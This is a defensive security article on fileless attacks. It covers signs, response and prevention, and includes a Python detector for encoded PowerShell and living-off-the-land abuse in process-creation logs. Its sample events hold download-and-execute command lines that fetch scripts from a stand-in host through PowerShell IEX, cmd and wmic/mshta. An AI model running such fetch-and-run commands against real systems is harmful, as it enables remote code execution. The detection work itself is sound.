Fileless Attacks: What they are, how they work, and ways to stop them

Fileless Attacks

What it is

A fileless attack runs malicious code directly in memory or abuses built-in tools (PowerShell, WMI, Office macros) so there’s little or nothing written to disk. That stealth lets it slip past traditional antivirus and move quickly inside a network.

How it works

  • A booby-trapped page, email, or doc launches scripts in memory.

  • Legit tools are abused to download commands, dump creds, or move laterally (“living off the land”).

  • Persistence hides in scheduled tasks, registry, or legit admin tools - not obvious EXE files.

What you may notice

  • Brief command windows flashing, odd PowerShell activity

  • Security tools disabled or failing to update

  • New scheduled tasks/services; spikes in CPU or network from system processes

  • Alerts about script hosts or encoded commands
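The last two signs above (script hosts launched with encoded or hidden-window commands, and system tools reaching out to the network) are exactly what process-creation telemetry lets you catch. The script below is an added example written for this page, not code from the original article or any product: it runs a handful of fileless-attack rules over constructed sample events shaped like Windows Security 4688 / Sysmon Event ID 1 records (parent image, image, command line). The `c2.example.invalid` host, the payload text and the event tuples are all constructed for illustration; the rules themselves (decode `-EncodedCommand`, count stealth flags, spot download-and-execute primitives, Office-to-script-host parenting, and `wmic process call create`) are the generic checks an EDR or SIEM rule would implement.

```python
"""Flag fileless-attack indicators in process-creation telemetry (added example)."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# -EncodedCommand (and its short forms) carries base64 of a UTF-16LE script.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.I)

# Flags that hide the window or skip profile/policy; typical of one-liners.
STEALTH_FLAGS = re.compile(
    r"-(?:nop|noprofile|noni|noninteractive|w\s+hidden|windowstyle\s+hidden"
    r"|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)

# Primitives that fetch or run code without writing a file to disk.
DOWNLOAD_EXEC = re.compile(
    r"\b(?:IEX|Invoke-Expression|DownloadString|DownloadFile|Invoke-WebRequest"
    r"|Net\.WebClient|FromBase64String)\b", re.I)

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}

# Living-off-the-land binaries paired with the argument shape that matters.
LOLBIN_PATTERNS = {
    "wmic.exe": re.compile(r"process\s+call\s+create", re.I),
    "mshta.exe": re.compile(r"https?://", re.I),
    "regsvr32.exe": re.compile(r"/i:https?://", re.I),
}


@dataclass
class Finding:
    index: int
    image: str
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE: leave it for an analyst


def analyze_event(index: int, parent: str, image: str, cmdline: str) -> Optional[Finding]:
    """Apply every rule to one event; return a Finding only if something fires."""
    parent_l, image_l = parent.lower(), image.lower()
    decoded = decode_encoded_command(cmdline)
    # Search the decoded script together with the visible command line so
    # base64 encoding cannot hide the download-and-execute primitive.
    searchable = cmdline if decoded is None else cmdline + "\n" + decoded
    reasons = []
    if decoded is not None:
        reasons.append("encoded PowerShell command (decoded for inspection)")
    # Requiring two stealth flags keeps plain '-NoProfile' admin usage quiet.
    if "powershell" in cmdline.lower() and len(STEALTH_FLAGS.findall(cmdline)) >= 2:
        reasons.append("PowerShell launched with two or more stealth/bypass flags")
    if DOWNLOAD_EXEC.search(searchable):
        reasons.append("download-and-execute or in-memory execution primitive")
    if parent_l in OFFICE_PARENTS and image_l in SCRIPT_HOSTS:
        reasons.append(f"Office process {parent} spawned script host {image}")
    lolbin = LOLBIN_PATTERNS.get(image_l)
    if lolbin and lolbin.search(cmdline):
        reasons.append(f"living-off-the-land binary {image} used for remote execution")
    return Finding(index, image, reasons, decoded) if reasons else None


def scan_events(events: List[Tuple[str, str, str]]) -> List[Finding]:
    """Run analyze_event over (parent, image, cmdline) tuples; keep only hits."""
    findings = []
    for i, (parent, image, cmdline) in enumerate(events):
        f = analyze_event(i, parent, image, cmdline)
        if f:
            findings.append(f)
    return findings


# Constructed sample payload, encoded the way -EncodedCommand expects it.
PAYLOAD_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage.ps1')"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD_TEXT.encode("utf-16-le")).decode("ascii")

# Constructed sample events: (parent image, image, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     f"powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand {ENCODED_PAYLOAD}"),
    ("winword.exe", "cmd.exe",
     "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://c2.example.invalid/macro.ps1')\""),
    ("svchost.exe", "wmic.exe", "wmic process call create \"mshta http://c2.example.invalid/x.hta\""),
    ("explorer.exe", "powershell.exe", "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"event {f.index} ({f.image}): " + "; ".join(f.reasons))
        if f.decoded:
            print("  decoded:", f.decoded)
```

Run as-is, it flags the first three sample events and stays silent on the benign `-NoProfile` listing and the ordinary `svchost.exe` start. The point worth copying into a real rule is the `searchable` line: matching only the raw command line misses anything wrapped in `-EncodedCommand`, so decode first and match on both.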

If you suspect it

  1. Disconnect from the network.

  2. Run a reputable EDR/anti-malware scan; reboot and scan again.

  3. Inspect Startup, Scheduled Tasks, services, and Office add-ins; remove unknowns.

  4. From a clean device, change passwords and enable MFA.

  5. Review logs/DNS for suspicious domains and block them.

Prevent it

  • Disable macros by default; allow only signed scripts.

  • Constrain PowerShell (Constrained Language Mode), restrict WMI/PSRemoting.

  • Keep OS, Office, browsers, and drivers updated.

  • Use EDR that monitors script behavior and command-line anomalies.

  • Apply least privilege; limit local admins and use application allow-listing.
